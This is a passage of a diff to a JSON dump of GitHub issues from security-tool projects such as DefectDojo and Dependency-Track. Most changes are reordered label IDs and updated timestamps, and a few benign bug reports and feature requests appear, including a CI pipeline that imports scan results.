.github/workflows/test-helm-chart.yml\n\n - `actions/checkout v4`\n - `azure/setup-helm v4.2.0`\n - `actions/setup-python v5`\n - `helm/chart-testing-action v2.6.1`\n\n
\n\n
\n
\n\n
helm-values\n
\n\n
helm/defectdojo/values.yaml\n\n - `nginx/nginx-prometheus-exporter 1.3.0`\n - `gcr.io/cloudsql-docker/gce-proxy 1.37.0`\n\n
\n\n
\n
\n\n
helmv3\n
\n\n
helm/defectdojo/Chart.yaml\n\n - `postgresql ~15.5.0`\n - `postgresql-ha ~9.4.0`\n - `redis ~19.6.0`\n\n
\n\n
\n
\n\n
npm\n
\n\n
docs/package.json\n\n - `postcss 8.4.47`\n - `autoprefixer 10.4.20`\n - `postcss-cli 11.0.0`\n\n
\n\n
\n
\n\n---\n\n- [ ] Check this box to trigger a request for Renovate to run again on this repository\n\n", @@ -132410,7 +132418,7 @@ "comments_count": 1, "closed_at": null, "created_at": "2020-09-30T15:51:11Z", - "updated_at": "2024-09-17T17:30:47Z", + "updated_at": "2024-09-19T17:48:55Z", "author": null, "repository": 1363, "assignees": [], @@ -136052,8 +136060,8 @@ "repository": 1363, "assignees": [], "labels": [ - 787, - 793 + 793, + 787 ] } }, @@ -136113,8 +136121,8 @@ "repository": 1363, "assignees": [], "labels": [ - 787, - 794 + 794, + 787 ] } }, @@ -136144,8 +136152,8 @@ "repository": 1363, "assignees": [], "labels": [ - 787, - 793 + 793, + 787 ] } }, @@ -136267,8 +136275,8 @@ "repository": 1363, "assignees": [], "labels": [ - 789, - 792 + 792, + 789 ] } }, @@ -137120,8 +137128,8 @@ "repository": 1363, "assignees": [], "labels": [ - 787, - 794 + 794, + 787 ] } }, @@ -140782,7 +140790,7 @@ "pk": 4667, "fields": { "nest_created_at": "2024-09-12T01:16:12.518Z", - "nest_updated_at": "2024-09-18T19:05:36.677Z", + "nest_updated_at": "2024-09-20T18:25:39.274Z", "node_id": "I_kwDOAdl0l86VrIWl", "title": "Import Nexus IQ to DefectDojo not same result", "body": "**Bug description**\r\nI scanned an example project : https://github.com/WebGoat/WebGoat.git , using Nexus IQ and imported the result file to DefectDojo , but didn t get exactly the same result. \r\n\r\n**Steps to reproduce**\r\nSteps to reproduce the behavior:\r\n1. Scan WebGoat project with Nexus IQ \r\n2. Generate File \r\n3. Import file to DefectDojo\r\n4. See DefectDojo report\r\n5. See Nexus Iq report \r\n\r\n**Expected behavior**\r\nI expected to see the same number of issues in DefectDojo and Nexus IQ \r\n\r\n**Deployment method** *(select with an `X`)*\r\n- [ ] Docker Compose\r\n- [ ] Kubernetes\r\n- [ ] GoDojo\r\n\r\n**Environment information**\r\n - Operating System: [e.g. Ubuntu 18.04]\r\n - DefectDojo version (see footer) or commit message: v. 2.37.1 ( release mode )\r\n\r\n\r\n**Sample scan files**\r\ntrigger: none\r\n\r\npool: agents-dev\r\n\r\nvariables:\r\n- name: nxiqUrl\r\n value: 'https://xxx.xxxx.xxxx'\r\n- name: nxiqAppId\r\n value: 'webgoat'\r\n- name: ddProduct\r\n value: 'testProduct'\r\n- name: ddProductType\r\n value: 'testProductType'\r\n- name: ddEngagement\r\n value: 'Nexus IQ API'\r\n\r\njobs:\r\n- job: build\r\n displayName: build\r\n container:\r\n image: testing/maven:3.8.3-openjdk-17\r\n endpoint: test-dev\r\n steps:\r\n - task: CmdLine@2\r\n inputs:\r\n script: 'git clone -b v2023.4 --single-branch https://github.com/WebGoat/WebGoat.git'\r\n\r\n - task: Maven@4\r\n inputs:\r\n mavenPomFile: 'WebGoat/pom.xml'\r\n publishJUnitResults: true\r\n testResultsFiles: '**/surefire-reports/TEST-*.xml'\r\n javaHomeOption: 'JDKVersion'\r\n mavenVersionOption: 'Default'\r\n mavenAuthenticateFeed: false\r\n effectivePomSkip: false\r\n sonarQubeRunAnalysis: false\r\n\r\n - task: PublishPipelineArtifact@1\r\n inputs:\r\n targetPath: '$(System.DefaultWorkingDirectory)/WebGoat/target'\r\n artifact: 'webgoat'\r\n publishLocation: 'pipeline'\r\n\r\n- job: scan_nxiq\r\n displayName: Scan Nexus IQ\r\n dependsOn: build\r\n container: \r\n image: testing/openjdk:11\r\n endpoint: test-dev\r\n steps:\r\n\r\n - task: DownloadPipelineArtifact@2\r\n inputs:\r\n buildType: 'current'\r\n artifactName: 'webgoat'\r\n targetPath: '$(System.DefaultWorkingDirectory)/WebGoat'\r\n\r\n - task: NexusIqPipelineTask@1\r\n inputs:\r\n nexusIqService: 'iq-dev'\r\n organizationId: 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy'\r\n applicationId: 'appId'\r\n stage: 'Build'\r\n\r\n- job: defectdojo\r\n displayName: DefectDojo Import\r\n steps:\r\n - task: AzureKeyVault@2\r\n inputs:\r\n azureSubscription: 'test2-dev'\r\n KeyVaultName: 'test-dev'\r\n SecretsFilter: 'NexusIQUserCode, NexusIQPassCode, dd-api-key'\r\n RunAsPreJob: true\r\n - task: CmdLine@2\r\n displayName: Generate Nexus IQ Report JSON File\r\n inputs:\r\n script: |\r\n npm install minimist\r\n node ./generate-report-data.js \\\r\n --user-code $(NexusIQUserCode) \\\r\n --pass-code $(NexusIQPassCode) \\\r\n --nxiq-url 'https://xxxx.xxxxx.xxxx' \\\r\n --public-app-id 'appId'\r\n\r\n - task: CmdLine@2\r\n displayName: Import to DefectDojo\r\n inputs:\r\n script: |\r\n curl -X POST \"https://xxxx.xxx.xx/api/v2/import-scan/\" \\\r\n -H \"accept: application/json\" \\\r\n -H \"Content-Type: multipart/form-data\" \\\r\n -H \"Authorization: Token $(dd-api-key)\" \\\r\n -F \"product_type_name=$(ddProductType)\" \\\r\n -F \"active=true\" \\\r\n -F \"verified=true\" \\\r\n -F \"engagement_name=$(ddEngagement)\" \\\r\n -F \"minimum_severity=Info\" \\\r\n -F \"product_name=$(ddProduct)\" \\\r\n -F \"scan_type=Sonatype Application Scan\" \\\r\n -F \"file=@nxiq-report.json\" \\\r\n -F \"auto_create_context=true\"\r\n cat nxiq-report.json\r\n\r\n**Screenshots**\r\nIf applicable, add screenshots to help explain your problem.\r\n\r\n![image](https://github.com/user-attachments/assets/f09bce30-54b4-48f5-8c1e-f5bfc0f958ba)\r\n\r\n![image](https://github.com/user-attachments/assets/61e1f05c-63a5-4bb7-ba96-c21ae21ee794)\r\n\r\n", @@ -141036,7 +141044,7 @@ "pk": 4676, "fields": { "nest_created_at": "2024-09-12T01:19:41.515Z", - "nest_updated_at": "2024-09-18T19:06:05.062Z", + "nest_updated_at": "2024-09-22T19:37:57.476Z", "node_id": "I_kwDOC4DVKM6T5_dw", "title": "Feature Request: OS Support for Amazon Linux 2023", "body": "Hi,\r\n\r\nit would be great if support for the Linux Enterprise OS `Amazon Linux 2023` could be provided: https://aws.amazon.com/linux/amazon-linux-2023/faqs/", @@ -141350,7 +141358,7 @@ "pk": 4687, "fields": { "nest_created_at": "2024-09-12T01:20:34.147Z", - "nest_updated_at": "2024-09-18T19:06:28.970Z", + "nest_updated_at": "2024-09-22T19:38:41.676Z", "node_id": "I_kwDOAgAqvM6DHxmf", "title": "Push linux/amd64 Docker image", "body": "The latest Docker image pushed is now linux/arm64 which makes it very slow when running from linux/amd64, so much that the initial start up is longer than 1 minute and breaks our tests, e.g.: https://github.com/zapbot/zap-mgmt-scripts/actions/runs/8370459364/job/22917853473#step:3:1\r\n\r\nWe can increase the wait time but it would be better if it was still provided linux/amd64 as before, which is the most common.", @@ -141610,7 +141618,7 @@ "pk": 4696, "fields": { "nest_created_at": "2024-09-12T01:20:50.730Z", - "nest_updated_at": "2024-09-18T19:06:33.718Z", + "nest_updated_at": "2024-09-22T19:39:01.886Z", "node_id": "I_kwDOF4Dx786TT8_U", "title": "Relation between CWE from parsers and expectedresults", "body": "Hello,\r\n\r\nThe title may not be very explicit, but I didn't know how to formulate it.\r\n\r\nI was looking into parsers and I saw that you assign Vulnerabilities to CWE numbers. I'm wondering why there are some CWE numbers that are not present in the [expected results](https://raw.githubusercontent.com/OWASP-Benchmark/BenchmarkJava/master/expectedresults-1.2.csv) file? I thought that the file contained all the vulnerabilities and that the score calculation was based on that.", @@ -141638,7 +141646,7 @@ "pk": 4697, "fields": { "nest_created_at": "2024-09-12T01:21:05.960Z", - "nest_updated_at": "2024-09-18T19:06:45.452Z", + "nest_updated_at": "2024-09-22T19:39:35.250Z", "node_id": "MDU6SXNzdWUzNTIyNDE5MjY=", "title": "DepShield encountered errors while building your project", "body": "The project could not be analyzed because of maven build errors. Please review the [error messages here](https://depshield.sonatype.org/error/DependencyTrack/branding/KSn-XReaNJ89q9zqgTerkg). Another build will be scheduled within 24 hours. If the build is successful this issue will be closed, otherwise the [error message](https://depshield.sonatype.org/error/DependencyTrack/branding/KSn-XReaNJ89q9zqgTerkg) will be updated.\n\nThis is an automated GitHub Issue created by Sonatype DepShield. GitHub Apps, including DepShield, can be managed from the [Developer settings](https://developer.github.com/apps/managing-github-apps/) of the repository administrators.", @@ -141666,7 +141674,7 @@ "pk": 4698, "fields": { "nest_created_at": "2024-09-12T01:21:10.957Z", - "nest_updated_at": "2024-09-18T19:06:49.568Z", + "nest_updated_at": "2024-09-22T19:39:39.903Z", "node_id": "I_kwDOIjAgeM6E1Rtd", "title": "dtrack.Component's structure is different the output of GET /api/v1/component/project/{uuid}", "body": "ComponentService.GetAll() returns (p Page[Component], err error). The structure of client-go's `dtrack.Component` is not the same as what the API server returns (although it matches the API server OpenAPI spec.)\r\n\r\nThe API server returns, for example, the following component keys, as verified by `curl -v -H \"X-API-Key: $DT_API_KEY\" -H \"Accept: application/json\" localhost:8080/api/v1/component/project/ca1a176a-97ec-4c51-af27-c6c156bd5b82 | jq \".[0] | keys\"`:\r\nclassifier, expandDependencyGraph, isInternal, lastInheritedRiskScore, metrics, name, project, purl, purlCoordinates, repositoryMeta, usedBy, uuid, version\r\n\r\nThe OpenAPI spec and dtrack.Component references many fields I have not seen returned by /api/v1/component/project/{uuid}, such as SHAs.\r\n\r\nI mention this because I'd really like access to `repositoryMeta.published`, which is returned, but not in a documented way.", @@ -141777,8 +141785,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -141808,8 +141816,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -141871,9 +141879,9 @@ 117 ], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -141905,8 +141913,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -141966,8 +141974,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -141997,8 +142005,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 803 + 803, + 799 ] } }, @@ -142090,8 +142098,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 805 + 805, + 799 ] } }, @@ -142241,8 +142249,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142274,8 +142282,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142284,7 +142292,7 @@ "pk": 4718, "fields": { "nest_created_at": "2024-09-12T01:21:56.059Z", - "nest_updated_at": "2024-09-12T01:21:56.059Z", + "nest_updated_at": "2024-09-20T18:27:00.641Z", "node_id": "MDU6SXNzdWUzODg3NDcxNTE=", "title": "Pipeline Documentation", "body": "I am having difficulty getting ingestion of BOM and XML as part of a Jenkins pipeline and would like to request a bit of documentation on how they can be implemented.\r\n\r\nThe [Continious Delivery](https://docs.dependencytrack.org/usage/cicd/) page mentions pipelines but contains no examples.\r\n\r\nI found [this excellent tip](https://github.com/jeremylong/DependencyCheck/issues/852) for usage of archiveArtifacts in DependencyCheck. I have used it for both dependency-check plugin *and* for cyclonedx-maven-plugin. ie, maybe the info should appear in a couple of different bits of documentation! \r\n\r\nI found this [dependency-check plugin pull request](https://github.com/jenkinsci/dependency-track-plugin/pull/1) that contains useful information... but also raises questions. For instance...\r\n\r\n - can one specify \"synchronous publishing mode\" in a pipeline?\r\n\r\nI have also been trying to get cyclonedx-node-module working in a pipeline using the NodeJS jenkins plugin. I have not yet succeeded!", @@ -142300,11 +142308,15 @@ "comments_count": 9, "closed_at": null, "created_at": "2018-12-07T17:31:44Z", - "updated_at": "2020-09-07T11:49:54Z", + "updated_at": "2024-09-20T15:43:44Z", "author": 1162, "repository": 1384, "assignees": [], - "labels": [] + "labels": [ + 828, + 809, + 839 + ] } }, { @@ -142333,8 +142345,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142364,8 +142376,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142395,8 +142407,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142426,8 +142438,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142457,8 +142469,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142519,8 +142531,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -142550,8 +142562,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -142613,8 +142625,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142707,9 +142719,9 @@ 2385 ], "labels": [ - 799, 802, - 807 + 807, + 799 ] } }, @@ -142769,8 +142781,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 809 + 809, + 799 ] } }, @@ -142800,8 +142812,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142831,8 +142843,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142862,8 +142874,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -142923,8 +142935,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -142985,8 +142997,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143016,8 +143028,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143047,8 +143059,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143078,8 +143090,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143140,8 +143152,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143171,8 +143183,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143265,8 +143277,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143296,8 +143308,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143327,9 +143339,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 812 + 812, + 799 ] } }, @@ -143359,8 +143371,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 801 + 801, + 799 ] } }, @@ -143390,8 +143402,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143421,8 +143433,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143512,8 +143524,8 @@ "repository": 1384, "assignees": [], "labels": [ - 806, - 810 + 810, + 806 ] } }, @@ -143543,8 +143555,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143574,8 +143586,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -143605,8 +143617,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143636,8 +143648,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143667,8 +143679,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143728,8 +143740,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143759,9 +143771,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 810 + 810, + 799 ] } }, @@ -143821,9 +143833,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 813 + 813, + 799 ] } }, @@ -143853,8 +143865,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143884,8 +143896,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -143915,8 +143927,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -143946,8 +143958,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -143977,8 +143989,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144068,8 +144080,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144310,8 +144322,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144371,8 +144383,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -144404,9 +144416,9 @@ 1248 ], "labels": [ - 799, 802, - 812 + 812, + 799 ] } }, @@ -144436,8 +144448,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144467,8 +144479,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144500,8 +144512,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144563,8 +144575,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144594,9 +144606,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 812 + 812, + 799 ] } }, @@ -144626,8 +144638,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144657,8 +144669,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 801 + 801, + 799 ] } }, @@ -144688,8 +144700,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144719,8 +144731,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144780,8 +144792,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144811,8 +144823,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -144842,8 +144854,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -144873,8 +144885,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -144904,10 +144916,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 803, - 812 + 812, + 799 ] } }, @@ -144937,8 +144949,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -144968,8 +144980,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -145059,9 +145071,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 807 + 807, + 799 ] } }, @@ -145091,8 +145103,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -145152,8 +145164,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -145303,9 +145315,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 812 + 812, + 799 ] } }, @@ -145365,8 +145377,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -145396,9 +145408,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -145428,9 +145440,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, - 802 + 802, + 799 ] } }, @@ -145462,8 +145474,8 @@ 117 ], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -145495,9 +145507,9 @@ 117 ], "labels": [ - 799, 816, - 817 + 817, + 799 ] } }, @@ -145623,8 +145635,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -145654,11 +145666,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 801, 812, - 818 + 818, + 799 ] } }, @@ -145748,8 +145760,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -145779,8 +145791,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -145963,8 +145975,8 @@ 117 ], "labels": [ - 799, - 820 + 820, + 799 ] } }, @@ -146052,8 +146064,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -146083,8 +146095,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -146114,9 +146126,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -146206,9 +146218,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, - 822 + 822, + 799 ] } }, @@ -146514,9 +146526,9 @@ 117 ], "labels": [ - 799, 812, - 823 + 823, + 799 ] } }, @@ -146666,8 +146678,8 @@ "repository": 1384, "assignees": [], "labels": [ - 810, - 824 + 824, + 810 ] } }, @@ -146697,9 +146709,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -146729,10 +146741,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, 802, - 825 + 825, + 799 ] } }, @@ -146762,9 +146774,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, + 825, 802, - 825 + 799 ] } }, @@ -146794,8 +146806,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -146857,8 +146869,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -146946,10 +146958,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 812, - 823 + 823, + 799 ] } }, @@ -147009,8 +147021,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 801 + 801, + 799 ] } }, @@ -147040,9 +147052,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -147072,9 +147084,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 801 + 801, + 799 ] } }, @@ -147104,8 +147116,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -147195,8 +147207,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -147256,8 +147268,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 809 + 809, + 799 ] } }, @@ -147287,8 +147299,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -147348,8 +147360,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -147379,8 +147391,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -147563,9 +147575,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, + 824, 801, - 824 + 799 ] } }, @@ -147775,8 +147787,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -147956,8 +147968,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148017,8 +148029,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148438,8 +148450,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148619,8 +148631,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 823 + 823, + 799 ] } }, @@ -148650,8 +148662,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -148681,8 +148693,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148712,9 +148724,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 812 + 812, + 799 ] } }, @@ -148774,8 +148786,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -148805,8 +148817,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148836,8 +148848,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -148867,9 +148879,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 812 + 812, + 799 ] } }, @@ -148959,8 +148971,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 801 + 801, + 799 ] } }, @@ -149020,8 +149032,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -149081,8 +149093,8 @@ "repository": 1384, "assignees": [], "labels": [ - 819, - 826 + 826, + 819 ] } }, @@ -149142,8 +149154,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 827 + 827, + 799 ] } }, @@ -149173,8 +149185,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -149326,9 +149338,9 @@ 1248 ], "labels": [ - 799, 800, - 814 + 814, + 799 ] } }, @@ -149541,8 +149553,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -149662,11 +149674,11 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 804, 812, 828, - 829 + 829, + 799 ] } }, @@ -149726,8 +149738,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -149787,10 +149799,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, 801, - 803 + 803, + 799 ] } }, @@ -149850,8 +149862,8 @@ "repository": 1384, "assignees": [], "labels": [ - 806, - 810 + 810, + 806 ] } }, @@ -149881,8 +149893,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 805 + 805, + 799 ] } }, @@ -149912,8 +149924,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 808 + 808, + 799 ] } }, @@ -150003,9 +150015,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 801, - 802 + 802, + 799 ] } }, @@ -150065,10 +150077,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, 812, - 828 + 828, + 799 ] } }, @@ -150128,8 +150140,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -150189,9 +150201,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, + 809, 804, - 809 + 799 ] } }, @@ -150251,8 +150263,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 804 + 804, + 799 ] } }, @@ -150282,8 +150294,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -150343,8 +150355,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 801 + 801, + 799 ] } }, @@ -150522,8 +150534,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 803 + 803, + 799 ] } }, @@ -150611,8 +150623,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 824 + 824, + 799 ] } }, @@ -150762,8 +150774,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -150823,8 +150835,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -150854,8 +150866,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -150885,8 +150897,8 @@ "repository": 1384, "assignees": [], "labels": [ - 807, - 810 + 810, + 807 ] } }, @@ -150916,9 +150928,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 800, - 827 + 827, + 799 ] } }, @@ -150948,8 +150960,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 827 + 827, + 799 ] } }, @@ -151009,8 +151021,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 827 + 827, + 799 ] } }, @@ -151220,8 +151232,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 823 + 823, + 799 ] } }, @@ -151281,8 +151293,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 802 + 802, + 799 ] } }, @@ -151460,8 +151472,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 827 + 827, + 799 ] } }, @@ -151491,8 +151503,8 @@ "repository": 1384, "assignees": [], "labels": [ - 799, - 800 + 800, + 799 ] } }, @@ -151522,10 +151534,10 @@ "repository": 1384, "assignees": [], "labels": [ - 799, + 824, 801, 802, - 824 + 799 ] } }, @@ -151675,8 +151687,8 @@ "repository": 1384, "assignees": [], "labels": [ - 800, - 811 + 811, + 800 ] } }, @@ -151706,9 +151718,9 @@ "repository": 1384, "assignees": [], "labels": [ - 799, 802, - 828 + 828, + 799 ] } }, @@ -151769,9 +151781,9 @@ "repository": 1384, "assignees": [], "labels": [ - 